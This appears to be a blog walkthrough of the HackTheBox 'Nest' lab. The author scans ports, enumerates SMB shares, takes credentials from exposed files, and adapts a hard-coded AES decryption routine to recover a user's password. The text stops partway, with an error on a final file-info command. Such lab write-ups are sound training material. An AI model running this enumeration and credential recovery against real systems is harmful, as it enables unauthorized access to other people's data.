Matheus Bratfisch Cogito ergo sum

Hackthebox - Write up of Nest machine

As you know, I have been studying pentesting. Recently I signed up at hackthebox.eu and started working through the easy machines.

This post walks through, step by step, what I did to get the user and administrator flags.

I always start with nmap:

$ nmap -T4 -Pn -p- -v 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 21:41 EDT
Initiating Parallel DNS resolution of 1 host. at 21:41
Completed Parallel DNS resolution of 1 host. at 21:41, 0.01s elapsed
Initiating Connect Scan at 21:41
Scanning 10.10.10.178 (10.10.10.178) [65535 ports]
Discovered open port 445/tcp on 10.10.10.178
Connect Scan Timing: About 3.75% done; ETC: 21:55 (0:13:16 remaining)
Connect Scan Timing: About 16.48% done; ETC: 21:47 (0:05:09 remaining)
Connect Scan Timing: About 39.14% done; ETC: 21:45 (0:02:21 remaining)
Connect Scan Timing: About 66.62% done; ETC: 21:44 (0:01:01 remaining)
Discovered open port 4386/tcp on 10.10.10.178
Completed Connect Scan at 21:44, 220.62s elapsed (65535 total ports)
Nmap scan report for 10.10.10.178 (10.10.10.178)
Host is up (0.15s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
4386/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 220.71 seconds

Port 4386 looks unusual, so let's telnet to it and enumerate it:

$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>debug 1

Invalid password entered
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days

Current Directory: ALL QUERIES
>setdir C:\Windows\Temp

Error: Access to the path 'C:\Windows\Temp\' is denied.
>

Now let's see what we have on SMB:

$ smbclient -L \\\\10.10.10.178\\
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\kali's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
SMB1 disabled -- no workgroup available

Listing everything with smbmap:

$ smbmap -H 10.10.10.178 -R --depth 10 -p a
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .                                                  
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 17:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 17:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    Shared
        Data                                                    READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 17:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 17:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    Shared
        .\Shared\
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    .
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    ..
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    Maintenance
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    Templates
        .\Shared\Maintenance\
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    .
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    ..
        -r--r--r--               48 Wed Aug  7 15:07:32 2019    Maintenance Alerts.txt
        .\Shared\Templates\
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    .
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    ..
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    HR
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    Marketing
        .\Shared\Templates\HR\
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    .
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    ..
        -r--r--r--              425 Wed Aug  7 18:55:36 2019    Welcome Email.txt
        IPC$                                                    NO ACCESS       Remote IPC
        Secure$                                                 NO ACCESS
        .                                                  
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 11:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 02:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 13:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 13:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    TempUser
        Users                                                   READ ONLY
        .\
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 11:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 02:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 13:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 13:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    TempUser

Downloading the files we found:

$ smbget -R smb://10.10.10.178/Data/Shared 
Password for [kali] connecting to //Data/10.10.10.178: 
Using workgroup WORKGROUP, user kali
smb://10.10.10.178/Data/Shared/Maintenance/Maintenance Alerts.txt                                                   
smb://10.10.10.178/Data/Shared/Templates/HR/Welcome Email.txt                             
Downloaded 473b in 11 seconds

Perfect, we have something. Let's check what is inside these files:

$ cat Templates/HR/Welcome\ Email.txt 
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR
$ cat Maintenance/Maintenance\ Alerts.txt 
There is currently no scheduled maintenance work

Trying to list everything again with this new credential:

$ smbmap -H 10.10.10.178 -R --depth 10 -u TempUser -p welcome2019
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .                                                  
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 17:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 17:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    Shared
        Data                                                    READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 17:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 17:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    Shared
        .\IT\
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    .
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    ..
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    Archive
        dr--r--r--                0 Wed Aug  7 18:59:34 2019    Configs
        dr--r--r--                0 Wed Aug  7 18:08:30 2019    Installs
        dr--r--r--                0 Sat Jan 25 19:09:13 2020    Reports
        dr--r--r--                0 Mon Aug  5 18:33:51 2019    Tools
        .\IT\Configs\
        dr--r--r--                0 Wed Aug  7 18:59:34 2019    .
        dr--r--r--                0 Wed Aug  7 18:59:34 2019    ..
        dr--r--r--                0 Wed Aug  7 15:20:13 2019    Adobe
        dr--r--r--                0 Tue Aug  6 07:16:34 2019    Atlas
        dr--r--r--                0 Tue Aug  6 09:27:08 2019    DLink
        dr--r--r--                0 Wed Aug  7 15:23:26 2019    Microsoft
        dr--r--r--                0 Wed Aug  7 15:33:54 2019    NotepadPlusPlus
        dr--r--r--                0 Wed Aug  7 16:01:13 2019    RU Scanner
        dr--r--r--                0 Tue Aug  6 09:27:09 2019    Server Manager
        .\IT\Configs\Adobe\
        dr--r--r--                0 Wed Aug  7 15:20:13 2019    .
        dr--r--r--                0 Wed Aug  7 15:20:13 2019    ..
        -r--r--r--              246 Wed Aug  7 15:20:13 2019    editing.xml
        -r--r--r--                0 Wed Aug  7 15:20:09 2019    Options.txt
        -r--r--r--              258 Wed Aug  7 15:20:09 2019    projects.xml
        -r--r--r--             1274 Wed Aug  7 15:20:09 2019    settings.xml
        .\IT\Configs\Atlas\
        dr--r--r--                0 Tue Aug  6 07:16:34 2019    .
        dr--r--r--                0 Tue Aug  6 07:16:34 2019    ..
        -r--r--r--             1369 Tue Aug  6 07:18:38 2019    Temp.XML
        .\IT\Configs\Microsoft\
        dr--r--r--                0 Wed Aug  7 15:23:26 2019    .
        dr--r--r--                0 Wed Aug  7 15:23:26 2019    ..
        -r--r--r--             4598 Wed Aug  7 15:23:26 2019    Options.xml
        .\IT\Configs\NotepadPlusPlus\
        dr--r--r--                0 Wed Aug  7 15:33:54 2019    .
        dr--r--r--                0 Wed Aug  7 15:33:54 2019    ..
        -r--r--r--             6451 Wed Aug  7 19:01:25 2019    config.xml
        -r--r--r--             2108 Wed Aug  7 19:00:36 2019    shortcuts.xml
        .\IT\Configs\RU Scanner\
        dr--r--r--                0 Wed Aug  7 16:01:13 2019    .
        dr--r--r--                0 Wed Aug  7 16:01:13 2019    ..
        -r--r--r--              270 Thu Aug  8 15:49:37 2019    RU_config.xml
        .\Shared\
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    .
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    ..
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    Maintenance
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    Templates
        .\Shared\Maintenance\
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    .
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    ..
        -r--r--r--               48 Wed Aug  7 15:07:32 2019    Maintenance Alerts.txt
        .\Shared\Templates\
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    .
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    ..
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    HR
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    Marketing
        .\Shared\Templates\HR\
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    .
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    ..
        -r--r--r--              425 Wed Aug  7 18:55:36 2019    Welcome Email.txt
        IPC$                                                    NO ACCESS       Remote IPC
        .                                                  
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    ..
        dr--r--r--                0 Wed Aug  7 15:40:25 2019    Finance
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    HR
        dr--r--r--                0 Thu Aug  8 06:59:25 2019    IT
        Secure$                                                 READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    ..
        dr--r--r--                0 Wed Aug  7 15:40:25 2019    Finance
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    HR
        dr--r--r--                0 Thu Aug  8 06:59:25 2019    IT
        .                                                  
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 11:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 02:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 13:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 13:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    TempUser
        Users                                                   READ ONLY
        .\
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 11:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 02:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 13:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 13:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    TempUser
        .\TempUser\
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    .
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    ..
        -r--r--r--                0 Wed Aug  7 18:56:02 2019    New Text Document.txt

Downloading everything again:

$ smbget -R smb://10.10.10.178/Data/IT/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data/IT//Configs/Adobe/editing.xml                                                 
smb://10.10.10.178/Data/IT//Configs/Adobe/Options.txt                                                
smb://10.10.10.178/Data/IT//Configs/Adobe/projects.xml                                               
smb://10.10.10.178/Data/IT//Configs/Adobe/settings.xml                                                   
smb://10.10.10.178/Data/IT//Configs/Atlas/Temp.XML                                                
smb://10.10.10.178/Data/IT//Configs/Microsoft/Options.xml                                    
smb://10.10.10.178/Data/IT//Configs/NotepadPlusPlus/config.xml                            
smb://10.10.10.178/Data/IT//Configs/NotepadPlusPlus/shortcuts.xml                            
smb://10.10.10.178/Data/IT//Configs/RU Scanner/RU_config.xml   

If we check the files we can see a password in RU_config.xml:

$ cat Configs/RU\ Scanner/RU_config.xml 
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

Looking at the other files we can see a few more interesting things, in particular the recent-files history in the Notepad++ config:

$ tail Configs/NotepadPlusPlus/config.xml 
        <Find name="redeem on" />
        <Find name="192" />
        <Replace name="C_addEvent" />
    </FindHistory>
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
</NotepadPlus>

Checking Temp.XML:

$ cat Configs/Atlas/Temp.XML 
<?xml version="1.0" encoding="UTF-8"?>
<bs:Brainstorm xmlns:bs="http://schemas.microsoft.com/visio/2003/brainstorming"><bs:topic bs:TopicID="T1"><bs:text>Marketing Plan</bs:text><bs:topic bs:TopicID="T1.1"><bs:text>Product</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Deanna Meyer</bs:value></bs:prop><bs:topic bs:TopicID="T1.1.1"><bs:text>New features</bs:text></bs:topic><bs:topic bs:TopicID="T1.1.2"><bs:text>Competitive strengths</bs:text></bs:topic><bs:topic bs:TopicID="T1.1.3"><bs:text>Competitive weaknesses</bs:text></bs:topic></bs:topic><bs:topic bs:TopicID="T1.2"><bs:text>Placement</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Jolie Lenehan</bs:value></bs:prop></bs:topic><bs:topic bs:TopicID="T1.3"><bs:text>Price</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Robert O'Hara</bs:value></bs:prop></bs:topic><bs:topic bs:TopicID="T1.4"><bs:text>Promotion</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Robert O'Hara</bs:value></bs:prop><bs:topic bs:TopicID="T1.4.1"><bs:text>Advertising</bs:text></bs:topic><bs:topic bs:TopicID="T1.4.2"><bs:text>Mailings</bs:text></bs:topic><bs:topic bs:TopicID="T1.4.3"><bs:text>Trade shows</bs:text></bs:topic></bs:topic></bs:topic><bs:association bs:topic1="T1.4" bs:topic2="T1.3"/></bs:Brainstorm>

We have a few possible user names. Since the Notepad++ recent-files list already gave us the path \\HTB-NEST\Secure$\IT\Carl, we can try to access it directly:

$ smbmap -H 10.10.10.178 -R Secure$/IT/Carl --depth 10 -p welcome2019 -u TempUser
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        .                                                  
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    ..
        dr--r--r--                0 Wed Aug  7 15:40:25 2019    Finance
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    HR
        dr--r--r--                0 Thu Aug  8 06:59:25 2019    IT
        Secure$                                                 READ ONLY
        .IT\Carl\
        dr--r--r--                0 Wed Aug  7 15:42:14 2019    .
        dr--r--r--                0 Wed Aug  7 15:42:14 2019    ..
        dr--r--r--                0 Wed Aug  7 15:44:00 2019    Docs
        dr--r--r--                0 Tue Aug  6 09:45:47 2019    Reports
        dr--r--r--                0 Tue Aug  6 10:41:55 2019    VB Projects
        .IT\Carl\Docs\
        dr--r--r--                0 Wed Aug  7 15:44:00 2019    .
        dr--r--r--                0 Wed Aug  7 15:44:00 2019    ..
        -r--r--r--               56 Wed Aug  7 15:44:16 2019    ip.txt
        -r--r--r--               73 Wed Aug  7 15:43:46 2019    mmc.txt
        .IT\Carl\VB Projects\
        dr--r--r--                0 Tue Aug  6 10:41:55 2019    .
        dr--r--r--                0 Tue Aug  6 10:41:55 2019    ..
        dr--r--r--                0 Tue Aug  6 10:41:53 2019    Production
        dr--r--r--                0 Tue Aug  6 10:47:41 2019    WIP
        .IT\Carl\VB Projects\WIP\
        dr--r--r--                0 Tue Aug  6 10:47:41 2019    .
        dr--r--r--                0 Tue Aug  6 10:47:41 2019    ..
        dr--r--r--                0 Fri Aug  9 11:36:45 2019    RU
        .IT\Carl\VB Projects\WIP\RU\
        dr--r--r--                0 Fri Aug  9 11:36:45 2019    .
        dr--r--r--                0 Fri Aug  9 11:36:45 2019    ..
        dr--r--r--                0 Wed Aug  7 18:05:54 2019    RUScanner
        -r--r--r--              871 Fri Aug  9 11:36:35 2019    RUScanner.sln
        .IT\Carl\VB Projects\WIP\RU\RUScanner\
        dr--r--r--                0 Wed Aug  7 18:05:54 2019    .
        dr--r--r--                0 Wed Aug  7 18:05:54 2019    ..
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    bin
        -r--r--r--              772 Wed Aug  7 18:05:09 2019    ConfigFile.vb
        -r--r--r--              279 Wed Aug  7 18:05:44 2019    Module1.vb
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    My Project
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    obj
        -r--r--r--             4828 Fri Aug  9 11:38:30 2019    RU Scanner.vbproj
        -r--r--r--              143 Wed Aug  7 16:00:28 2019    RU Scanner.vbproj.user
        -r--r--r--              133 Wed Aug  7 18:05:58 2019    SsoIntegration.vb
        -r--r--r--             4888 Wed Aug  7 18:06:03 2019    Utils.vb
        .IT\Carl\VB Projects\WIP\RU\RUScanner\bin\
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    .
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    ..
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    Debug
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    Release
        .IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    .
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    ..
        -r--r--r--              441 Wed Aug  7 16:00:11 2019    Application.Designer.vb
        -r--r--r--              481 Wed Aug  7 16:00:11 2019    Application.myapp
        -r--r--r--             1163 Wed Aug  7 16:00:11 2019    AssemblyInfo.vb
        -r--r--r--             2776 Wed Aug  7 16:00:11 2019    Resources.Designer.vb
        -r--r--r--             5612 Wed Aug  7 16:00:11 2019    Resources.resx
        -r--r--r--             2989 Wed Aug  7 16:00:11 2019    Settings.Designer.vb
        -r--r--r--              279 Wed Aug  7 16:00:11 2019    Settings.settings
        .IT\Carl\VB Projects\WIP\RU\RUScanner\obj\
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    .
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    ..
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    x86

Several new files, so let's download them:

$ smbget -R smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt                                                                                                            
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt                                                                                                           
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb                                                                             
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb                                                                                
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb                                                        
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp                                                              
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb                                                                
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb                                                          
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx                                                                 
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb                                                           
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings                                                              
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj                                                                         
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user                                                                    
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb                                                                         
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb                                                                                  
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln                                                                                       
Downloaded 25.18kB in 39 seconds

Checking their contents:

$ cat VB\ Projects/WIP/RU/RUScanner/Module1.vb 
Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}

    End Sub

End Module

This indicates that the program reads the RU_Config.xml we found earlier and decrypts the password from it. Looking more closely at Utils.vb:

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function

This is clearly the routine that produced the password we found: the passphrase, salt, iteration count, IV and key size are all hard-coded. If we modify the file a bit so it can run on its own:

Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Module Module1
    Public Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function

    Public Sub Main()
        Dim plain As String
        plain = DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")
        Console.WriteLine(plain)
    End Sub
End Module

Remember that DecryptString takes its parameters from RU_config.xml.

Running this script on dotnetfiddle.net we get "xRxRxPANCAK3SxRxRx", so that is the password of the user c.smith. Trying to list the files again with that username and password:

$ smbmap -H 10.10.10.178 -R --depth 10 -p xRxRxPANCAK3SxRxRx -u C.Smith

We can now see several different files and get the user flag. Downloading everything again:

$ smbget -R smb://10.10.10.178/Users/C.Smith -U c.smith
Password for [c.smith] connecting to //Users/10.10.10.178: 
Using workgroup WORKGROUP, user c.smith
smb://10.10.10.178/Users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe                                                          
smb://10.10.10.178/Users/C.Smith/HQK Reporting/Debug Mode Password.txt                               
smb://10.10.10.178/Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml                              
smb://10.10.10.178/Users/C.Smith/user.txt                                
Downloaded 17.27kB in 12 seconds

Debug Mode Password.txt is empty, which seems strange, so let's try to get more information about it:

$ smbclient -H \\\\10.10.10.178\\Users/ -U c.smith
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\c.smith's password: 
Try "help" to get a list of possible commands.
smb: \> cd C.Smith
dirsmb: \C.Smith\> dir
  .                                   D        0  Sun Jan 26 02:21:44 2020
  ..                                  D        0  Sun Jan 26 02:21:44 2020
  HQK Reporting                       D        0  Thu Aug  8 19:06:17 2019
  user.txt                            A       32  Thu Aug  8 19:05:24 2019
cd 
                10485247 blocks of size 4096. 6543375 blocks available
smb: \C.Smith\> cd HQK Reporting\
cd \C.Smith\HQK\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \C.Smith\> cd "HQK Reporting" 
smb: \C.Smith\HQK Reporting\> dir
  .                                   D        0  Thu Aug  8 19:06:17 2019
  ..                                  D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019

                10485247 blocks of size 4096. 6543375 blocks available
smb: \C.Smith\HQK Reporting\> allinfo " Debug Mode Password.txt"
NT_STATUS_OBJECT_NAME_NOT_FOUND getting alt name for \C.Smith\HQK Reporting\ Debug Mode Password.txt
